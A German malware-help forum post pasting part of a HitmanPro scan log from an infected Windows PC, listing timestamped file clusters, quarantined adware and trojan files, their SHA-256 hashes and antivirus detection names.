         -36.2s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\A5F4C763F88647462D6CC3BD2C4D68EA
         -35.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\19\
         -35.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\19\C60265D2AEF7475B.dat
         -35.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\02\ED33484DA71254E2.dat
         -34.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\58\8ADB242C25ABC556.dat
         -34.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\89\7EA0D5541E6D44E5.dat
         -34.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\02\94DDF3D411512896.dat
         -34.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\00\908B870CD63A5850.dat
         -34.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\52\6D89BF061152B6F8.dat
         -34.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\88\ED85F9E93752E5A0.dat
         -34.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\23\
         -34.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\23\AAEDB4F156B30F9B.dat
         -34.0s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{5CE1F024-3B70-469E-841E-569BAA050A16}
         -33.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\35\DA01BBA6F7AF3E3B.dat
         -30.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\89\7EA0D5541E6D44E5.dat
         -27.4s C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\datareporting\archived\2017-02\1486934118474.004ed726-e962-412e-b280-4549e1511a8c.main.jsonlz4
         -27.4s C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\saved-telemetry-pings\004ed726-e962-412e-b280-4549e1511a8c
         -24.2s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_BEB725938A5DDBC0476AEF53D3F3399C
         -24.2s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_BEB725938A5DDBC0476AEF53D3F3399C
         -23.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\35\DA01BBA6F7AF3E3B.dat
         -23.0s C:\ProgramData\Microsoft\Windows Defender\Scans\RtSigs\Data\2741755e95077aca48c7a1c4364436f22e03efeb
         -22.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{27B248FF-42DF-4C66-9927-E998ECC1C67F}
         -22.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\07\
         -22.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\07\3004FAB3-8238-4106-9960-4145311D9DC9
         -20.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\63\0D60310A3DE505EB.dat
         -18.7s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Flex-Fix.exe.log
         -18.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\63\0D60310A3DE505EB.dat
         -17.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\80\
         -17.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\80\87EB7F301000A1E4.dat
         -17.8s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\15\
         -17.8s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\15\C84F83C6-757C-4DA0-83A9-832C2044BAA3
         -17.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\16\A35F04C07F086E0C.dat
         -17.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\3023AE8DBCD4D9CC28BFB0B87DE1F7B2
         -16.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\77\F6A4E5AA0BD799E5.dat
         -16.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\47\0A58E2141BC5D6FF.dat
         -16.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\53\F539CAB543896981.dat
         -16.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\56\E08F1601340D9930.dat
         -16.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\76\4D1506E35A18A4C0.dat
         -13.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\16\A35F04C07F086E0C.dat
         -13.2s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCookies\D8UAI5I0.cookie
         -12.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{2DB708F8-9FF1-4350-B1A6-0720A61FE57D}
         -12.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData\1B\
         -12.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData\1B\1B33F58BCBEAA336FCAC78EFD0C3B152C653F564
         -12.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Entries\{80030EA5-0000-0000-2755-74F4A7D28A96}
         -12.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources\1B\
         -12.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources\1B\1B33F58BCBEAA336FCAC78EFD0C3B152C653F564
         -11.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\96\87D9361895BDB728.dat
         -11.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\69\F1B7787110988501.dat
         -10.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\045B2201FB68EBA634B6A7ED6EBC470B
         -9.8s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\ext[1].htm
         -9.5s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{B57C28AF-09A8-4AFA-A7F4-1088010BD300}
         -9.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\68\E0D7C962546966F4.dat
         -9.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\48\
         -9.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\48\D2A3F94A0D56F3DC.dat
         -9.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\06\
         -9.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\06\72812E563511C7DE.dat
         -9.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\31\
         -9.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\31\46194FA3B215CD4B.dat
         -9.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\39\E1736E0D64F753FB.dat
         -9.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\98\1D69515B65576102.dat
         -9.2s C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\
         -7.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\95\6F1BEABC1717AED7.dat
         -5.3s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C84A.tmp.log
         -3.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\69\5CD3D2EEE75040AD.dat
         -3.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\92\79C3EF559B624514.dat
         -3.6s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\11\8FEE14203F7DDA1B.dat
         -3.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\14\80D5272735EAE1C6.dat
         -3.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\37\
         -3.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\37\63854D67A493D655.dat
         -1.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\53\BEF4A957CC80EB15.dat
          0.0s C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\updengine.exe
          0.4s C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\uninstall.exe
          0.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\30\
          0.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\30\04AD70B1461F0422.dat
          0.9s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zaamla.exe.log
          2.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\42\
          2.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\42\5A8E78D960A9B016.dat
          2.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\19\43AAB79DC8C9763F.dat
          2.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\86\D587334F575975FA.dat
          4.1s C:\Users\Barbara\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\8059E9A0D314877E40FE93D8CCFB3C69_90ECA0B4D2228AFE69CC082886D8E2BE
          4.1s C:\Users\Barbara\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\8059E9A0D314877E40FE93D8CCFB3C69_90ECA0B4D2228AFE69CC082886D8E2BE
          4.5s C:\FRST\Quarantine\C\Program Files (x86)\vpF0TnTYqt\s.xml
          6.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\39\1218955AE2A1AB5F.dat
          7.0s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{E080DC10-3E81-479D-BDB8-C3846F374A65}
          7.2s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\ext[1].htm
          8.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\98\A56ABAE9E895454E.dat
          8.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\41\
          8.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\41\8B2CE58878430E61.dat
          8.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\68\E0D7C962546966F4.dat
          8.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\14\363DA3BE40841B26.dat
          9.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\23\C308C81C5D4FD43F.dat
          9.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\66\66E4054878E2C722.dat
          9.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\84\D38C0DC1B5C2FAFC.dat
          9.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\81\59654F7CFB1518C5.dat
          9.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\25\78BAC9FAB06D1FED.dat
          9.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\54\07695BEF7F2F153E.dat
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\57\
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\57\70F40DF465C7C45D.dat
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\89\20A73F6863A4B6E9.dat
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\33\439C2791622F42F5.dat
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\00\12FF45C68065A628.dat
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\55\A13DACFD4512E8EF.dat
          9.8s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF
          9.8s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF
          9.9s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\705A76DE71EA2CAEBB8F0907449CE086_4C70C2683402FDFCF83B9865CC4FE25B
          9.9s C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\705A76DE71EA2CAEBB8F0907449CE086_4C70C2683402FDFCF83B9865CC4FE25B
         10.8s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\settib[1].ex_
         10.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\98\A56ABAE9E895454E.dat
         12.2s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\LegSet5[1].ex_
         12.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\33\F4969D3F7B8FD519.dat
         13.0s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{A9A05D7F-39D6-4F69-97AF-0B44F9A5128E}
         14.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData\CB\
         14.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\ResourceData\CB\CB3B5EA91ADCEC54F836EC4977C3A70037D97A32
         14.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Entries\{80032CF2-0000-0000-67FF-0B68D700BD65}
         14.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources\CB\
         14.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Resources\CB\CB3B5EA91ADCEC54F836EC4977C3A70037D97A32
         14.0s C:\ProgramData\Microsoft\Windows Defender\Quarantine\Entries\{80033B91-0000-0000-16EF-37CA3DA585C6}
         15.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\78\
         15.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\78\EEEDBB2DD87AA896.dat
         16.2s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\431B8774-0AEC-4DDF-AFCA-CDB4A28C453A[1].htm
         17.2s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCookies\NNOIZZAK.cookie
         18.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\78\EEEDBB2DD87AA896.dat
         19.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\73\4BBB9B08EAE2F661.dat
         20.6s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\BA76C84DACBD991C36125B7F4B8B26A9
         22.8s C:\Users\Barbara\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\279986\1486934168
         23.3s C:\Users\Barbara\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\789de393af8a3b32162638775e4389cb46329688d7f2bdaed03bafd3990a03a2
         23.3s C:\Users\Barbara\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\795c91a7347ca63ef05ed9274ab9e6227a5a7f6a2a8833481cb2e820ab39fc62
         23.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{4DBF7A0E-1DC7-4632-8F50-E7E1FAB7CBB3}
         25.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\41BEA2C434093546D715CD7AF422C5A2
         25.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\42\9358653C34B0C0A6.dat
         28.8s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\L91K04I9\sange[1].ex_
         30.1s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\2OT58FTF\peri[1].ex_
         30.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\51\2C9CD63D3378C2D3.dat
         30.5s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8828F39C7C0CE9A14B25C7EB321181BA_8C550960E440B9C3B93A6A0AA915C9BE
         30.5s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8828F39C7C0CE9A14B25C7EB321181BA_8C550960E440B9C3B93A6A0AA915C9BE
         30.5s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\89394434080B4DDFB94582252924A22B_9783957CFF0F1F1D112FB396EED4DB53
         30.5s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\89394434080B4DDFB94582252924A22B_9783957CFF0F1F1D112FB396EED4DB53
         31.8s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\smp2[1].exe
         31.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\64\B4690B1D1CE442E8.dat
         32.6s C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\datareporting\archived\2017-02\1486934178480.85a6efbc-5000-45cc-a22d-2ed50ca5eb1b.main.jsonlz4
         32.6s C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\saved-telemetry-pings\85a6efbc-5000-45cc-a22d-2ed50ca5eb1b
         32.6s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4780BD8BD932150ED949E0EE026AEB0_646D4B8EA018D0844AB54FF5FED9EF80
         32.6s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4780BD8BD932150ED949E0EE026AEB0_646D4B8EA018D0844AB54FF5FED9EF80
         32.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\30\282BC7862C25E5EA.dat
         32.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\33\79979684BC074131.dat
         32.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\20\B865640E5DE9B0A4.dat
         32.9s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\993FFD97CEB0680CE8107AA979DE699C_D8E46797ED739339356DA70D4226D30C
         32.9s C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\993FFD97CEB0680CE8107AA979DE699C_D8E46797ED739339356DA70D4226D30C
         33.5s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\L91K04I9\peedg[1].ex_
         34.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\64\E5E32F81709B7008.dat
         34.6s C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk
         35.0s C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk
         40.2s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{11FF4840-2DC9-44B6-B7D0-FC03F240BA57}
         47.4s C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\peri2[1].ex_
         47.8s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\45AD3DFC0F601EFD04319173B1CF0640
         48.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\96\
         48.3s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\96\41C9877C87CEAA8C.dat
         48.7s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\57B9457E15A5EA3858971144F8105D17
         49.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\96\41C9877C87CEAA8C.dat
         50.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\58\97B91F505A156806.dat
         50.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\58\
         52.5s C:\FRST\Quarantine\C\Program Files\8K5F5GX6AI\
         52.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\21\BCD485E9DF91DFE5.dat
         53.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\21\BCD485E9DF91DFE5.dat
         53.3s C:\FRST\Quarantine\C\Program Files\8K5F5GX6AI\8K5F5GX6A.exe.config
         53.4s C:\FRST\Quarantine\C\Program Files\8K5F5GX6AI\cast.config
         53.5s C:\FRST\Quarantine\C\Program Files\8K5F5GX6AI\uninstaller.exe.config
         53.5s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\cqVhJCNVN.exe.log
         53.5s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\98\258C867135802C4A.dat
         53.9s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\98\258C867135802C4A.dat
         54.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\40\C7CCCEBACF75171C.dat
         61.3s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{2D1B890F-BDF1-4A15-BD52-D7EE605CCAD4}
         72.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\2\60\60E0970FEE313FF4.dat
         72.2s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\60\60E0970FEE313FF4.dat

BaBi · 13.02.2017, 23:05

und zuletzt noch hitman teil 7

Code:

ATTFilter

   C:\FRST\Quarantine\C\Program Files\PDR238V39I\22XHB7149.exe
      Size . . . . . . . : 370.176 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 19:19:03)
      Entropy  . . . . . : 6.0
      SHA-256  . . . . . : 94907AD556D329BF81F74431AD27758778BCD19DF41BCF5E65AB4644D8326E35
      Product  . . . . . : GoodThingsShow
      Publisher
      Description  . . . : GoodThingsShow
      Version  . . . . . : 1.0.0.0
      LanguageID . . . . : 0
    > Bitdefender  . . . : Gen:Heur.MSIL.Krypt.4
      Fuzzy  . . . . . . : 105.0
      Forensic Cluster
         -0.0s C:\FRST\Quarantine\C\Program Files\PDR238V39I\
          0.0s C:\FRST\Quarantine\C\Program Files\PDR238V39I\22XHB7149.exe
          1.2s C:\FRST\Quarantine\C\Program Files\PDR238V39I\22XHB7149.exe.config
          1.3s C:\FRST\Quarantine\C\Program Files\PDR238V39I\cast.config
          1.3s C:\FRST\Quarantine\C\Program Files\PDR238V39I\uninstaller.exe.config
          3.0s C:\Users\Barbara\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\WeLoveYou.exe.log

   C:\FRST\Quarantine\C\Program Files\XPQ0UG79CA\XPQ0UG79C.exe
      Size . . . . . . . : 370.176 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:19:10)
      Entropy  . . . . . : 6.0
      SHA-256  . . . . . : 94907AD556D329BF81F74431AD27758778BCD19DF41BCF5E65AB4644D8326E35
      Product  . . . . . : GoodThingsShow
      Publisher
      Description  . . . : GoodThingsShow
      Version  . . . . . : 1.0.0.0
      LanguageID . . . . : 0
    > Bitdefender  . . . : Gen:Heur.MSIL.Krypt.4
      Fuzzy  . . . . . . : 105.0
      Forensic Cluster
         -0.0s C:\FRST\Quarantine\C\Program Files\XPQ0UG79CA\
          0.0s C:\FRST\Quarantine\C\Program Files\XPQ0UG79CA\XPQ0UG79C.exe
          0.5s C:\FRST\Quarantine\C\Program Files\XPQ0UG79CA\XPQ0UG79C.exe.config
          0.6s C:\FRST\Quarantine\C\Program Files\XPQ0UG79CA\cast.config
          0.9s C:\FRST\Quarantine\C\Program Files\XPQ0UG79CA\uninstaller.exe.config

   C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\2OT58FTF\GreenStar[1].exe
      Size . . . . . . . : 146.432 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:53)
      Entropy  . . . . . : 5.3
      SHA-256  . . . . . : D375EED15C8F1E74938410D3548EE888DB5A2303F4AE1A3D1DBD319ACBC57F0E
    > Bitdefender  . . . : Trojan.GenericKD.4175644
      Fuzzy  . . . . . . : 108.0

   C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\2OT58FTF\WDSrvWrapper[1].exe
      Size . . . . . . . : 47.959 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:53)
      Entropy  . . . . . : 6.9
      SHA-256  . . . . . : 0EDC38BFD729B31806CAA1B3D7085DDAC2A516B5F0B135CA2134ED600B4CC8CD
    > Kaspersky  . . . . : not-a-virus:AdWare.Win32.Vopak.dpwd
      Fuzzy  . . . . . . : 108.0

   C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\36noTpqwF[1].exe
      Size . . . . . . . : 432.640 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:47)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : 175E195122BAA391FF5B72F94B099B97E88946331324F7EE34BCC2436EF3137D
    > Bitdefender  . . . : Generic.Adware.ConvertAd.E8F43C04
    > Kaspersky  . . . . : not-a-virus:AdWare.Win32.ConvertAd.cerw
      Fuzzy  . . . . . . : 108.0

   C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\3T5QDGKZ\FinalInstaller_dotnet4[1].exe
      Size . . . . . . . : 3.030.016 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:58)
      Entropy  . . . . . : 7.4
      SHA-256  . . . . . : 67F5BD21A41B48CA7C3FB781B401D722E915855E5A2F3B877FC91D7B9130E072
      Needs elevation  . : Yes
      Product  . . . . . : Installer
      LanguageID . . . . : 0
    > Bitdefender  . . . : Gen:Variant.Adware.Zusy.146056
    > Kaspersky  . . . . : not-a-virus:AdWare.MSIL.Agent.bir
    > HitmanPro  . . . . : App/OfferIns-D
      Fuzzy  . . . . . . : 112.0

   C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\1uIKINIHc[1].exe
      Size . . . . . . . : 230.400 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:13:51)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : D9CF1C7250AB9C68A818F051DD487C4BF29BEC2B8AEBFC47EC0A4023AA0EF5B7
    > Bitdefender  . . . : Gen:Variant.Zusy.217410
    > Kaspersky  . . . . : not-a-virus:AdWare.Win32.ConvertAd.bxsv
      Fuzzy  . . . . . . : 108.0


Suspicious files ____________________________________________________________

   C:\Users\Barbara\Desktop\Virenscanner etc\FRST64.exe
      Size . . . . . . . : 2.421.248 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 19:06:51)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : 11563E8B7DD4A13A707D21E27379415A55F81957CD6AE18548ED1136ECAA2395
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -0.2s C:\Users\Barbara\Desktop\Virenscanner etc\
         -0.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware .htm
         -0.0s C:\Users\Barbara\Desktop\Virenscanner etc\FRST Anleitung.htm
          0.0s C:\Users\Barbara\Desktop\Virenscanner etc\FRST64.exe
          0.1s C:\Users\Barbara\Desktop\Virenscanner etc\mbam-setup-2.2.1.1043.exe
          0.9s C:\Users\Barbara\Desktop\Virenscanner etc\PANDAFREEAV.exe
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\1.png
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\11x11progress.gif
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\2.png
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\3.png
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\4.png
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\5.png
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\5998d1269568699-anleitung-malwarebytes-anti-malware-sprache.png
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\5999d1269568754-anleitung-malwarebytes-anti-malware-update.png
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\6.png
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\6002d1269569416-anleitung-malwarebytes-anti-malware-aktualis.jpg
          1.0s C:\Users\Barbara\Desktop\Virenscanner etc\Anleitung   Malwarebytes Anti-Malware -Dateien\6002d1269569418t-anleitung-malwarebytes-anti-malware-aktuali.jpg
